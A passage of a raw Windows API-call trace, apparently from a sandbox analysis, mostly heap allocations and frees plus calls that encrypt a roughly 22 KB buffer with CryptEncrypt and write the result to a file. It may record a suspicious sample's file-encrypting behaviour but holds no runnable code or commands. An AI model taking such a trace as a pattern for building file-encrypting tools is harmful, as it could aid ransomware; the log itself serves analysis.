dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.278] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0112.278] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0112.278] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0112.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0112.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0112.324] TranslateMessage (lpMsg=0x144eb54) returned 0 [0112.324] DispatchMessageW (lpMsg=0x144eb54) returned 0x0 [0112.324] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0112.324] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0112.324] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0112.324] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0112.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0112.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0112.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca9a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0112.325] CryptEncrypt (in: hKey=0x41abfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x5975, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x5980) returned 1 [0112.325] CharLowerBuffW (in: lpsz="byte[22913]", cchLength=0xb | out: lpsz="byte[22913]") returned 0xb [0112.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0112.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0112.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0112.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0112.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0112.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0112.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0112.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0112.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5981) returned 0x4526c90 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5975) returned 0x452c620 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0112.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5975) returned 0x4531fa0 [0112.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0112.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cac10 [0112.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0112.327] CryptEncrypt (in: hKey=0x41abfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4526c90*, pdwDataLen=0x144e538*=0x5975, dwBufLen=0x5980 | out: pbData=0x4526c90*, pdwDataLen=0x144e538*=0x5980) returned 1 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0112.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0112.327] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0112.327] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0112.327] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.328] WriteFile (in: hFile=0x258, lpBuffer=0x4542c48*, nNumberOfBytesToWrite=0x5980, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4542c48*, lpNumberOfBytesWritten=0x144ef3c*=0x5980, lpOverlapped=0x0) returned 1 [0112.329] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0112.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0112.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0112.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0112.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0112.330] CryptDestroyKey (hKey=0x41abfc0) returned 1 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0112.330] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0112.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0112.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.330] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0112.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0112.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0112.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0112.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0112.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0112.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ec8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0112.331] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0112.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0112.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0112.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0112.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0112.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0112.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0112.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.332] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0112.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0112.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0112.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0112.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0112.332] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.332] 